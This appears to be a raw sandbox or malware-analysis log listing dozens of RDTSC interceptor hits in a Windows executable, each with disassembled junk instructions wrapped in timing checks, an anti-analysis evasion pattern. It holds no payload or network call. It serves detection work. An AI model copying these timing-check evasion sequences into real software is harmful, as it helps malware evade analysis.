Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1C9F second address: 11C1CA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1CA8 second address: 11C1CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A82h 0x00000009 jmp 00007F66E8B84A80h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1CD0 second address: 11C1CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1CD5 second address: 11C1CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F66E8B84A76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1CDF second address: 11C1CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C1E62 second address: 11C1E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C9979 second address: 11C99AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F66E96D98DAh 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 jnp 00007F66E96D98EEh 0x00000016 jmp 00007F66E96D98E8h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C7A2E second address: 11C7A51 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E8B84A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F66E8B84A7Fh 0x00000010 pop edi 0x00000011 jo 00007F66E8B84A7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C7A51 second address: 11C7A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F66E96D98DCh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F66E96D98DEh 0x00000012 jmp 00007F66E96D98E8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C7A8A second address: 11C7ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A88h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F66E8B84A85h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C7C08 second address: 11C7C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98E3h 0x00000009 popad 0x0000000a jmp 00007F66E96D98E8h 0x0000000f pop eax 0x00000010 pushad 0x00000011 ja 00007F66E96D98DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C802B second address: 11C8038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C854E second address: 11C8571 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F66E96D98E6h 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C8856 second address: 11C885F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C885F second address: 11C8891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F66E96D98FEh 0x0000000f push edi 0x00000010 ja 00007F66E96D98D6h 0x00000016 jmp 00007F66E96D98E8h 0x0000001b pop edi 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C8ED2 second address: 11C8ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C8ED7 second address: 11C8EED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F66E96D98D6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f ja 00007F66E96D98D6h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C8EED second address: 11C8EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F66E8B84A76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C944C second address: 11C9452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C9452 second address: 11C945D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C945D second address: 11C9463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C9463 second address: 11C9467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C9467 second address: 11C9479 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F66E96D98D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C96C7 second address: 11C96E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F66E8B84A86h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11C96E4 second address: 11C9700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98DEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F66E96D98DEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11CF3E1 second address: 11CF3E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11CF3E7 second address: 11CF3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F66E96D98D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11CF3F1 second address: 11CF401 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007F66E8B84A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11CF401 second address: 11CF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11CF405 second address: 11CF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D250E second address: 11D2543 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66E96D98D6h 0x00000008 ja 00007F66E96D98D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F66E96D98F0h 0x00000016 jmp 00007F66E96D98E4h 0x0000001b jp 00007F66E96D98D6h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D2543 second address: 11D254B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D254B second address: 11D2550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D2550 second address: 11D2559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D2695 second address: 11D269B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D298A second address: 11D298E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D2DC3 second address: 11D2DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F66E96D98E2h 0x00000008 pop eax 0x00000009 jc 00007F66E96D98D8h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jc 00007F66E96D9901h 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007F66E96D98DFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11DB071 second address: 11DB075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11DB075 second address: 11DB079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D94AE second address: 11D94CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F66E8B84A87h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D94CF second address: 11D94D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11D8E86 second address: 11D8E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F66E8B84A7Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11E3924 second address: 11E393D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E96D98DFh 0x00000009 jnp 00007F66E96D98D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11E3BEC second address: 11E3C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A82h 0x00000007 push esi 0x00000008 jne 00007F66E8B84A76h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F66E8B84A84h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11E62DE second address: 11E630E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F66E96D98DCh 0x0000000c pushad 0x0000000d jo 00007F66E96D98D6h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a pushad 0x0000001b jne 00007F66E96D98D6h 0x00000021 jng 00007F66E96D98D6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11E79CC second address: 11E79F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A7Ch 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F66E8B84A81h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11E79F3 second address: 11E7A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F66E96D98D6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jo 00007F66E96D98D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11F19BA second address: 11F19C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11F6B1C second address: 11F6B35 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F66E96D98DBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11F914A second address: 11F914E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11F914E second address: 11F9172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66E96D98E7h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11FF3B8 second address: 11FF3E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F66E8B84A7Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11FF3E4 second address: 11FF43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F66E96D98F5h 0x0000000b jmp 00007F66E96D98E9h 0x00000010 je 00007F66E96D98D6h 0x00000016 pushad 0x00000017 jng 00007F66E96D98D6h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 push edi 0x00000024 jns 00007F66E96D98EEh 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 120924F second address: 120927C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F66E8B84A7Eh 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1209090 second address: 1209096 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1209096 second address: 12090DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jmp 00007F66E8B84A87h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F66E8B84A7Ch 0x00000015 jns 00007F66E8B84A76h 0x0000001b popad 0x0000001c jmp 00007F66E8B84A7Fh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 12090DA second address: 1209107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E96D98E5h 0x00000008 jmp 00007F66E96D98E0h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1209107 second address: 120910D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 120910D second address: 1209111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1209111 second address: 1209115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 120D7D5 second address: 120D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F66E96D98DEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 120D7EE second address: 120D7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1211C6B second address: 1211C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1211F34 second address: 1211F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1211F3C second address: 1211F40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1212109 second address: 1212129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jnl 00007F66E8B84A82h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1212129 second address: 121212D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 121212D second address: 1212131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1212279 second address: 121227D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 12123E6 second address: 121240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A86h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jne 00007F66E8B84A7Eh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 121240D second address: 121242F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F66E96D98DCh 0x0000000c jne 00007F66E96D98D6h 0x00000012 jmp 00007F66E96D98DDh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1213105 second address: 121310B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 121310B second address: 1213111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1213111 second address: 1213120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F66E8B84A76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1213120 second address: 1213126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1213126 second address: 121312B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 121312B second address: 1213131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1213131 second address: 121314E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A89h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 121314E second address: 121315C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F66E96D98D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 121315C second address: 121317A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F66E8B84A8Dh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1219FD0 second address: 1219FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123480E second address: 1234814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1234814 second address: 123481D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123DEBA second address: 123DEBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123DEBE second address: 123DEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123DEC4 second address: 123DEDD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66E8B84A7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F66E8B84A76h 0x00000010 pushad 0x00000011 jo 00007F66E8B84A76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123E041 second address: 123E05B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66E96D98D6h 0x00000008 jne 00007F66E96D98D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F66E96D98D6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123E05B second address: 123E067 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
